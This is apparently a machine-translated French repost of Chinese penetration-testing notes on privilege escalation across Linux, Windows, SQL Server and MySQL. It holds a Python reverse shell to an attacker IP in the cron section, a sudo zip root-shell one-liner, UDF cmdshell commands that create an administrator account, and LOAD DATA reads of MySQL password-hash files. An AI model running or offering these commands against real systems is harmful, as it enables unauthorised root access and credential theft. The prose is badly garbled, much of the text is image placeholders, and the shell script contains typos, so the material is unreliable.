当前位置:网站首页>Essais de pénétration - sujets d'autorisation

Essais de pénétration - sujets d'autorisation

2022-06-25 05:06:00 Amingmm

Introduction au droit de revendication

Souvent Enlevez le serveur web Le service n'est qu'un utilisateur avec de faibles privilèges (www-data)
Pour la pénétration de l'intranet ,Il faut qu'on en parle àroot
L'amélioration des permissions est une étape cruciale ,
Un attaquant peut souvent exploiter une vulnérabilité du noyau /Permissions mal configurées/root Accès aux services, etc. pour trouver des percées ,
Pour atteindre l'objectif d'augmenter les permissions .

linux Le processus de revendication du système implique plus que des vulnérabilités , De nombreuses configurations de systèmes sont également impliquées .

Prémisse de la revendication:

  • J'ai pris le pouvoir inférieur shell
  • La machine envahie a nc,python,perl Et des outils très courants
  • Possibilité de télécharger et de télécharger des fichiers

LinuxDroit de rétractation

Autorisation de vulnérabilité du noyau-Considérations privilégiées

Vérifiez d'abord si une vulnérabilité du noyau peut être utilisée pour l'autorisation . Commencez par comprendre le système

 #Voir la version de publication
cat /etc/issue
cat /etc/*-release
# Afficher la version du noyau
uname -a


# Voir la distribution du système Ubuntu 
lsb_release -a 

Rechercher l'utilisation du Code de débordement du noyau searchsploit
Insérer la description de l'image ici

 gcc xxx.c -o exploit
chmod +x exploit
./exploit 
 

Autorisation de débordement du noyau , Mais en général, ça ne marche pas .

Texte clairrootAccès par mot de passe

La plupartlinux Les mots de passe du système et /etc/passwd、/etc/shadow Ces deux profils sont liés à ;
passwdLes utilisateurs sont stockés à l'intérieur,
shadow C'est codé hash;
Etpasswd Est entièrement lisible par l'utilisateur ,rootWritable.
shadowOui seulementroot Capable de lire et d'écrire .
CracklinuxNom d'utilisateur et mot de passe correspondant

UtiliserJohn Cet outil est utilisé pour décoder .
Ça pourrait être dansroot Voir le mot de passe sous autorisation ( Si je ne sais pas rootMot de passe)

Tâches prévues

Il peut y avoir des tâches programmées dans le système ,
En général, ces tâches sont exécutées parcrontabPour gérer,
A les permissions de l'utilisateur auquel il appartient.

NonrootLes utilisateurs autorisés ne peuvent pas être listésrootDe la tâche programmée de l'utilisateur.
Mais/etc/ Les tâches prévues pour le système interne peuvent être énumérées
Par défaut, ces programmes sont rootExécution des autorisations,
Si vous rencontrez quelqu'un qui configure le script pour qu'il puisse être écrit par n'importe quel utilisateur ,
À ce moment - là, vous pouvez modifier le script et attendre la connexion en arrière rootshell;
Si les fichiers sont programmés pour être exécutés pythonScript, Vous pouvez remplacer le script précédent par le script suivant .

#!/usr/bin/python
import os,subprocess,socket

s=socket.socekt(sicket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.0.2.4","4444"))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

Voir/etc/crontab Fichiers avec ou sans permissions d'écriture
Insérer la description de l'image ici

Réutilisation des mots de passe

linuxExiger que l'utilisateur passe de l'équipement terminal(tty)Entrez le mot de passe,Au lieu des entrées standard,
C'est - à - diresudo L'essence est de lire le clavier lors de l'entrée du mot de passe ,Au lieu debashLes caractères à l'intérieur.
Alors Entrez le mot de passe , Un terminal supplémentaire est nécessaire .python Avec cette fonction , C'est un terminal analogique ,Entrée

python -c "import pty;pty.spawn('/bin/bash')"

Insérer la description de l'image ici
Voir si le terminal virtuel a été lancé
ssh Connexion
ssh [email protected]

UtilisationzipFaire une réclamation
sudo -l Vue de ce qui est actuellement disponible rootInformations sur l'ordre de revendication.

Matching Defaults entries for zico on this host:
    env_reset, exempt_group=admin,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User zico may run the following commands on this host:
    (root) NOPASSWD: /bin/tar
    (root) NOPASSWD: /usr/bin/zip
 

Peut être utilisézipFaire une réclamation

touch exploit
sudo -u root zip exploit.zip exploit -T --unzip-command="sh -c /bin/bash"

Insérer la description de l'image ici

05 Prise de pouvoir et pénétration de l'intranet

Chapitre III Accès à la base de données

Section I SQL ServerExploitation et autorisation des vulnérabilités de la base de données

Insérer la description de l'image iciInsérer la description de l'image ici

Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image iciInsérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image iciInsérer la description de l'image ici
dbo Autorité Sauvegarde de la base de données Je ne peux pas Exécuter les commandes

Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici
SESHELL
mdb Registre Fonctionnement Exécuter les commandes

Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici

Section II MySQLVulnérabilités et droits de la base de données

Insérer la description de l'image ici
Insérer la description de l'image ici

mysql rootSous autorité Droit de rétractation

Problèmes d'installation
Par défaut Administrateur système En bas. Installation

Pour servir Démarrage

Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici
Sauvegarde de la base de données Juste Oui. Documentation

Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici

Insérer la description de l'image ici
mof Timing Tout va bien. Droit de rétractation

Insérer la description de l'image ici
Insérer la description de l'image ici

Distant Exécuter les commandes Rebondir shell Reviens! *(Machine d'attaque Port d'écoute )

Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici

UDF Autorité d'exécution des commandes du système

● Linux UDF
L'administrateur qui a atteint l'objectif d'acquisition par l'intermédiaire de la base de données shell, Pour passer d'une autorité inférieure à une autorité supérieure

sleep(),sum(),ascii()

Fonctions personnalisées par l'utilisateur
 Écrivez vos propres fonctions ,Il a3Valeur de retour de l'espèce,
Respectivement.STRINGType de caractère,INTEGERTaille,REAL Type réel
  


-MaîtrisemysqlComptes dans la base de données,De posséder le bonmysqlDeinsertEtdeleteAutorité,Pour créer et jeter des fonctions.Avoir peut transformerudf.dllPermission d'écrire dans le répertoire approprié

Version supérieure à5.1Deudf.dllMets - le.mysqlInstaller le répertoirelibplugin Dossier pour créer une fonction personnalisée . Le Répertoire par défaut n'existe pas et doit être créé par vous - même ,Créer sous le Répertoire d'installationlibpluginDossiers,Et ensuite,udf.dll Exporter vers ce répertoire .
- windows Prémisse de la revendication

mysqlVersion supérieure à5.1,
udf.dllLe fichier doit être placé àmysqlInstaller le répertoirelib pluginSous le dossier

mysqlVersion inférieure à5.1,
udf.dllDocuments windows server 2003 Placé en dessous de c:windows system32Table des matières,
Inwindows server - - 2000 Placé en dessous de c:winnt system32Table des matières.

Insérer la description de l'image ici

 Tout d'abord,、Regarde ça.MySQL- Oui.32En position ou64Bitwise, Il y a plusieurs façons de voir ça :
mysql -V
mysql --version
EntréeMySQLDans la base de données,Mise en œuvre: 


show variables like '%datadir%';
-- C:\ProgramData\MySQL\MySQL Server 5.7\Data\


show variables like '%version_%';



Insérer la description de l'image ici

Insérer la description de l'image ici

 create function cmdshell returns string soname 'udf.dll' 
select cmdshell('net user iis_user [email protected]#abcABC /add'); 
select cmdshell('net localgroup administrators iis_user /add'); 
select cmdshell('regedit /s d:web3389.reg'); 
drop function cmdshell; 
select cmdshell('netstat -an'); 

Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici

  • Exigences root Autorité

  • mof - Oui. winLe système est livré avec Vulnérabilité

MysqlLes utilisateurs deFileConditions d'autorisation-Accès restreintrootMot de passe

MysqlExploitation des vulnérabilités(Excès de pouvoir, Obtenir de faibles permissions rootMot de passe)

Impossible de passerLoad_fileLire le document
Ou parinto dumpfile Ouinto outfile Pour écrire des documents

Adoptionload data infile Peut lire le fichier local dans la base de données , Pour qu'on puisse passer à travers ce bug Pour lire les fichiers sur le serveur

LiremysqlFichier de base de données pour,mysqlDe la bibliothèqueuser Le tableau contient tous les hash

Insérer la description de l'image ici

 LOAD DATA LOCAL INFILE 'C:/boot.ini' INTO TABLE test FIELDS TERMINATED BY '';  
 
LOAD DATA LOCAL INFILE 'C:/wamp/bin/mysql/mysql5.6.12/data/mysql/user.MYD' INTO TABLE test2 fields terminated by ''; 

select * from test2;

Insérer la description de l'image ici

AvecwinhexOuvre.user.mydDocumentation
Insérer la description de l'image ici
Par00 Les caractères ont été tronqués , Ce qui a fait que rien n'est entré dans la base de données .
Voici comment contourner cette limite .
Après plusieurs tentatives pour découvrir ,AjouterLINES TERMINATED BY ‘’ C'est tout., De cette façon, l'enfant traite le symbole de troncature comme un séparateur ,Déclaration complète

 
LOAD DATA LOCAL INFILE 'C:/wamp/bin/mysql/mysql5.6.12/data/mysql/user2.MYD' INTO TABLE test2 fields terminated by '' LINES TERMINATED BY ''; 

Insérer la description de l'image ici

Windows Smb Replay / Relais Utilisation

Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image iciInsérer la description de l'image ici
Insérer la description de l'image iciInsérer la description de l'image iciInsérer la description de l'image iciInsérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image iciInsérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici

Insérer la description de l'image ici

CTF-Accès difficile au noyau

Insérer la description de l'image iciInsérer la description de l'image iciInsérer la description de l'image iciInsérer la description de l'image iciInsérer la description de l'image ici
Insérer la description de l'image iciInsérer la description de l'image ici
Insérer la description de l'image iciInsérer la description de l'image iciInsérer la description de l'image iciInsérer la description de l'image iciInsérer la description de l'image iciInsérer la description de l'image iciInsérer la description de l'image iciInsérer la description de l'image iciInsérer la description de l'image iciInsérer la description de l'image iciInsérer la description de l'image iciInsérer la description de l'image iciInsérer la description de l'image iciInsérer la description de l'image iciInsérer la description de l'image iciInsérer la description de l'image iciInsérer la description de l'image iciInsérer la description de l'image iciInsérer la description de l'image iciInsérer la description de l'image iciInsérer la description de l'image iciInsérer la description de l'image iciInsérer la description de l'image iciInsérer la description de l'image iciInsérer la description de l'image iciInsérer la description de l'image iciInsérer la description de l'image iciInsérer la description de l'image iciInsérer la description de l'image iciInsérer la description de l'image iciInsérer la description de l'image iciInsérer la description de l'image iciInsérer la description de l'image iciInsérer la description de l'image ici

windows EXPDroit de rétractation

EXPDroit de débordement(Ne pas utiliser la technique/Accès facile)

exploit —>windowsUtilisation des retombées

shell Connexion

Droits de connexion virtuelle

  • Couteau de cuisine chinois
  • Épée de fourmis
  • Malaisieshell Exécuter les commandes dir

En un mot, le cheval de Troie


Insérer la description de l'image iciInsérer la description de l'image ici

S'occuper devirualbox Problèmes d'interconnexion avec les machines physiques

Insérer la description de l'image ici

Créer un environnement

Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici


  1. Voir les permissions whoami systeminfo (Patch)
  2. Augmenter les permissions net user xxx xxx /add net localgroup
  3. Afficher les ports tasklist /svc netstat -ano

Insérer la description de l'image iciInsérer la description de l'image iciInsérer la description de l'image ici

  • Pour l'instant Allez. CFichier disque
    Insérer la description de l'image iciInsérer la description de l'image ici
  • Voir les correctifs
    Insérer la description de l'image ici
  • Patch Non disponible
  • Fais ce que tu veux.

Insérer la description de l'image iciInsérer la description de l'image ici
Insérer la description de l'image ici

  • Par inadvertance J'ai trouvé un Outils

mysql5.1------LinuxDroit de rétractation

#1 Simple coup profond

Insérer la description de l'image ici

Numériser les mots de passe faibles par l'actif    FTP  Mysql   Redis   ssh   RPC 

Insérer la description de l'image ici
Insérer la description de l'image iciInsérer la description de l'image ici

 Parce que root Autorité  Pas de permissions basses et élevées UDP Droit de rétractation

iPrintemps et automne\05 Prise de pouvoir et pénétration de l'intranet\

Chapitre I Droit de première vue

Section I Vue d'ensemble de la revendication

Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici

Commandes de base

Voir la connexion de l'utilisateur query user

Insérer la description de l'image ici

Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici
Insérer la description de l'image ici

Porosité du bétail sale

Logiciels tiers Droit de rétractation - prDroit de rétractation

Accès à la base de données

sqlserver SA xp cmd shell

mysql udf Extension du plug - in Droit de confirmationMOF Remplacer le fichier Droit de rétractation

dllDocumentation Chargement

ftp Méthode d'entrée vnc Configuration

Méthode d'entrée Remplacerexe Redémarrer Chargement automatique

  • webshell C'est basé sur Middleware Lors de l'installation Permission de Base

Insérer la description de l'image ici

Section II Accès basé sur le déchiffrement de mot de passe

Insérer la description de l'image ici
Insérer la description de l'image ici

Hash obtient le crack

Insérer la description de l'image ici
Insérer la description de l'image ici

Réseau local arp 、 dns Détournement Renifler

原网站

版权声明
本文为[Amingmm]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/176/202206250402210978.html